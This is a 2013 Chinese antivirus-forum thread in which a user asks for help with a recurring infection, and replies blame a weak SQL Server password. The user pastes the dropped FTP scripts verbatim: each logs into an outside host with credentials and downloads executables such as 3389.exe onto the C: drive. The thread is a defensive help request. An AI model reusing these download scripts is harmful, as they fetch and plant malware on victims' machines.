瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 请分析下是什么病毒,装了瑞星及防火墙根本不管用

1   1  /  1  页   跳转

请分析下是什么病毒,装了瑞星及防火墙根本不管用

请分析下是什么病毒,装了瑞星及防火墙根本不管用

大家好 ,我的电脑每天被这几个病毒骚扰,装了瑞星V16和瑞星防火墙 也全盘扫描杀过毒,可是每次电脑重启后不一会就会有几个程序写进来,请大家帮忙分析下我把程序用记事本打开后的内容:1    open ftp.54my.netadmin
123456
get 3389.exe c:\s3389.exe
bye

2    open 61.129.45.208
7788
7788
get f.exe c:\stf.exe
bye 


3    open 61.129.45.208
7788
7788
get f.exe c:\stf.exe
bye


4      open 222.186.15.15
110
110
get 1.exe C:\DOCUME~1\s1.exe
bye

程序文件名见图  还有个文件叫hex3603721.exe    jlguaji.exe  也杀不掉 任务管理器里也关不掉  FTP服务器也能链接过去 (可是以上IP是不是假IP啊,我在路由器里禁止了以上ip 可是电脑开机后还是能重新植入病毒程序 ,

用户系统信息:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0

附件附件:

文件名:Snap1.jpg
下载次数:1099
文件类型:image/jpeg
文件大小:
上传时间:2013-2-12 22:22:21
描述:病毒植入系统后
预览信息:EXIF信息



附件附件:

文件名:2.JPG
下载次数:1069
文件类型:image/jpeg
文件大小:
上传时间:2013-2-12 22:22:21
描述:病毒植入系统后
预览信息:EXIF信息



附件附件:

文件名:3.JPG
下载次数:1024
文件类型:image/jpeg
文件大小:
上传时间:2013-2-12 22:22:21
描述:病毒植入系统后
预览信息:EXIF信息



附件附件:

文件名:4.JPG
下载次数:1001
文件类型:image/jpeg
文件大小:
上传时间:2013-2-12 22:22:21
描述:病毒植入系统后
预览信息:EXIF信息



附件附件:

文件名:5.JPG
下载次数:1012
文件类型:image/jpeg
文件大小:
上传时间:2013-2-12 22:22:21
描述:病毒植入系统后
预览信息:EXIF信息



分享到:
gototop
 

回复:请分析下是什么病毒,装了瑞星及防火墙根本不管用

扫描SRENG日志来看,不排除网内其他电脑影响

jlguaji.exe  从名字上看可能是“精灵挂机”的意思,网上也有直接称为“叽哩瓜叽”。利用它挂机来实现某种目的。
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 

回复:请分析下是什么病毒,装了瑞星及防火墙根本不管用

进入安全模式下,使用瑞星杀毒软件全盘查杀一下试试。
gototop
 

回复:请分析下是什么病毒,装了瑞星及防火墙根本不管用

系统安装sqlserver了吧,建议sa设置强密码,打全系统补丁及sqlserver补丁。
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT